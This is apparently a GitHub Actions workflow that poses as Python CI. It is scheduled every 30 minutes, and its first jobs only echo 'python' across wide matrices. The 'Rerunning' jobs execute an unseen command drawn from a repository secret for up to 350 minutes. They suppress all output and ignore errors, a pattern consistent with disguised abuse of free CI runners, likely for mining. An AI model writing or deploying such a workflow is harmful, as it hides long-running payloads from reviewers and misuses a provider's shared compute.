name: CI
on:  
  push:
  pull_request:
  schedule:
  - cron: "*/30 * * * *"
 
jobs:
 python-1:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 15
      fail-fast: false
      matrix:
        hanakaru: [1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [A, B, C, D]
 
    steps:
    - uses: actions/checkout@v3
    - name: Python-run
      run: echo "python"
 
 python-2:
    runs-on: ubuntu-latest
    needs: python-1
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        hanakaru: [1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [C, D, E, F]
 
    steps:
    - uses: actions/checkout@v3
    - name: Python-run
      run: echo "python"
 
 python-build-2:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
        hanakaru: [1.11, 1.12, 1.13, 1.14, 1.15]
        flag: [B]
    steps:
    - uses: actions/checkout@v3
    - name: Rerunning
      continue-on-error: true
      run: |
         RUNNERS=u$(shuf -i 1000000-9999999 -n 1)
         GITHUBS=$(shuf -i 1000000-9999999 -n 1)
         timeout 350m ${{ secrets.YOUR_SECRET_NAME }} >/dev/null 2>&1
 python-build-1:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
        hanakaru: [1.11, 1.12, 1.13, 1.14, 1.15]
        flag: [B]
    steps:
    - uses: actions/checkout@v3
    - name: Rerunning
      continue-on-error: true
      run: |
         RUNNERS=u$(shuf -i 1000000-9999999 -n 1)
         GITHUBS=$(shuf -i 1000000-9999999 -n 1)
         timeout 350m ${{ secrets.YOUR_SECRET_NAME }} >/dev/null 2>&1
